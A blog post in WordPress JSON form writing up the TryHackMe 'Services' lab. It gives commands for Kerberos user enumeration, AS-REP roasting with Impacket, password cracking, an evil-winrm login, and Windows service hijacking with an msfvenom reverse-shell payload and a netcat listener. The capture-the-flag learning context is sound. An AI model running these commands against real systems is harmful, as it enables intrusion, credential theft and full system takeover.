{"id":504,"date":"2023-04-28T16:41:41","date_gmt":"2023-04-28T14:41:41","guid":{"rendered":"https:\/\/babdcatha.net\/?p=504"},"modified":"2023-04-30T18:14:12","modified_gmt":"2023-04-30T16:14:12","slug":"tryhackme-services","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/04\/28\/tryhackme-services\/","title":{"rendered":"TryHackMe : Services"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hi! The <a href=\"https:\/\/tryhackme.com\/room\/services\">Services<\/a> room was recently released on TryHackMe.com, and I wanted to take a look at it. The scenario isn&#8217;t really developed here, so let&#8217;s jump right into it.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">As always, once the target machine is started, we scan it using nmap to try to find open ports and services running on the machine. In this case, we find quite a few :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"942\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial.png\" alt=\"\" class=\"wp-image-508\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial-768x754.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We find a DNS server, a webserver, SMB and a lot of unknown services. The webpage is a generic website template :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"944\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website.png\" alt=\"\" class=\"wp-image-510\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website.png 962w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website-768x754.png 768w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Enumerating it doesn&#8217;t return anything particularly interesting, and it seems that we cannot connect anonymously to the SMB service. We also cannot login using rpcclient and no username. Maybe we can find usernames though ? Let&#8217;s check their website to see if we can find more info about the members of their organization.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">About us<\/mark> page, we find a few people :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large has-custom-border is-style-default wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"404\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-1024x404.png\" alt=\"\" class=\"wp-image-515\" style=\"border-style:none;border-width:0px;border-radius:30px\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-1024x404.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-300x118.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-768x303.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members.png 1183w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And, on the contact page, we find an email address, as well as their domain name, which we can add to our <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/etc\/hosts<\/mark> file :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large has-custom-border wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"413\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-1024x413.png\" alt=\"\" class=\"wp-image-517\" style=\"border-radius:30px\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-1024x413.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-300x121.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-768x310.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact.png 1191w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Following this pattern, we can expect other addresses to be in the same format, so, we these usernames are also likely to exist :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>j.doe<\/li>\n\n\n\n<li>j.rock<\/li>\n\n\n\n<li>w.masters<\/li>\n\n\n\n<li>j.larusso<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">In order to check that, we can try using the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/security\/kerberos\/kerberos-authentication-overview\">Kerberos<\/a>  service running on port 88. To do that, we can use an nmap script called <a href=\"https:\/\/nmap.org\/nsedoc\/scripts\/krb5-enum-users.html\">krb5-enum-users<\/a> with the following command :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='services.local',userdb=user_list.txt $TARGET_IP<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And indeed, the four users are recognized :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"415\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum.png\" alt=\"\" class=\"wp-image-524\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum-300x130.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum-768x332.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Maybe we can learn a bit more with another enumeration tool, present in the Metasploit Framework : the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">auxiliary\/gather\/kerberos_enumusers<\/mark> payload. This will give us a bit more information about the target accounts, most notably if they need pre-authentication or not. If for some users pre-authentication is disabled, we can perform an attack called AS_REP roasting. Basically, we will be able to get an unencrypted AS_REP response, and try to crack their password with it. This is the output we get when enumerating the accounts :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"942\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur.png\" alt=\"\" class=\"wp-image-527\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur-768x754.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay, the account of John Rock is vulnerable! Let&#8217;s get an AS_REP response using <a href=\"https:\/\/wadcoms.github.io\/wadcoms\/Impacket-GetNPUsers\/\">Impacket<\/a> with this command :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">python3 GetNPUsers.py services.local\/ -dc-ip $TARGET_IP -usersfile users_list.txt -format john -outputfile hash.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"> an then, let&#8217;s try to crack their password using john :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"411\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur.png\" alt=\"\" class=\"wp-image-531\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur-300x128.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur-768x329.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay! We now have john&#8217;s password, and we can try to connect to the different services running on the machine, and, the one on port 5985, WinRM, works for us ! We can connect using Evil-WinRM :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">evil-winrm -i $TARGET_IP -u 'j.rock' -p '$JOHN_PASS'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And we can now read the user flag :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"942\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur.png\" alt=\"\" class=\"wp-image-540\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur-768x754.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hurray, one of the two flags is ours ! Now, it&#8217;s time to get more privileges.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Since the room is called Services, it would probably be a good idea to look at the services running on the machine :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"346\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services.png\" alt=\"\" class=\"wp-image-544\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services-300x108.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services-768x277.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we have a few services running with privileges, let&#8217;s see if we can modify any of them. If we can, we can then use them to start any program with escalated privileges.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To do just that, I could have used <a href=\"https:\/\/github.com\/carlospolop\/PEASS-ng\/tree\/master\/winPEAS\">WinPEAS<\/a> or <a href=\"https:\/\/github.com\/PowerShellEmpire\/PowerTools\/blob\/master\/PowerUp\/PowerUp.ps1\">PowerUp.ps1<\/a>, but instead, to better understand how these scripts worked, I have created a small PowerShell script (here on <a href=\"https:\/\/github.com\/BabdCatha\/Powershell-writeable-services\">GitHub<\/a>). It is based on the code Evil-WinRM uses to enumerate services, and works by trying to changed the service&#8217;s DisplayName to it&#8217;s current value &#8211; this doesn&#8217;t change anything if it works, but we get an error if we don&#8217;t have the permissions to modify the service. This allows us to know if we can modify the service or not. To use it, we need to specify the directory the script is placed in to Evil-WinRM when we launch it by using the -s option :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">evil-winrm -i $TARGET_IP -u 'j.rock' -p '$JOHN_PASS' -s \/path\/to\/script\/directory\/<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Once Evil-WinRM is launched with this option, we can load the file by typing it&#8217;s name, and then use the Get-Writeable-Services function defined inside. Here is what it gives us :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services.png\" alt=\"\" class=\"wp-image-550\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we can see that a few services that have privileges are modifiable. Here, we are going to use the vulnerable AWSLiteAgent service to get a reverse shell. First, we create our payload using msfvenom :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=$LOCAL_IP LPORT=4451 -f exe -o revshell.exe<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We can then upload it to the target machine, modify the service to use our reverse shell as it&#8217;s binary, and restart it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"288\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service.png\" alt=\"\" class=\"wp-image-553\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service-300x90.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service-768x230.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And, on the listener we created on our machine using :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">nc -lvnp 4451<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We get our reverse shell as <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">NT AUTHORITY\\System<\/mark> ! Yay! We can now navigate to the Administrator&#8217;s desktop and get our flag :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-12\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"326\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur.png\" alt=\"\" class=\"wp-image-554\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur-300x102.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur-768x261.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And that&#8217;s two out of two flags for this room ! I hope you enjoyed this little challenge, as it was a nice refresher on hijacking Windows services \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi! The Services room was recently released on TryHackMe.com, and I wanted to take a look at it. The scenario isn&#8217;t really developed here, so let&#8217;s jump right into it. As always, once the target machine is started, we scan it using nmap to try to find open ports and services running on the machine. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[45,46,44,43,47,8],"class_list":["post-504","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-as_rep","tag-evil-winrm","tag-kerberos","tag-msrpc","tag-services","tag-tryhackme"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=504"}],"version-history":[{"count":40,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/504\/revisions"}],"predecessor-version":[{"id":559,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/504\/revisions\/559"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}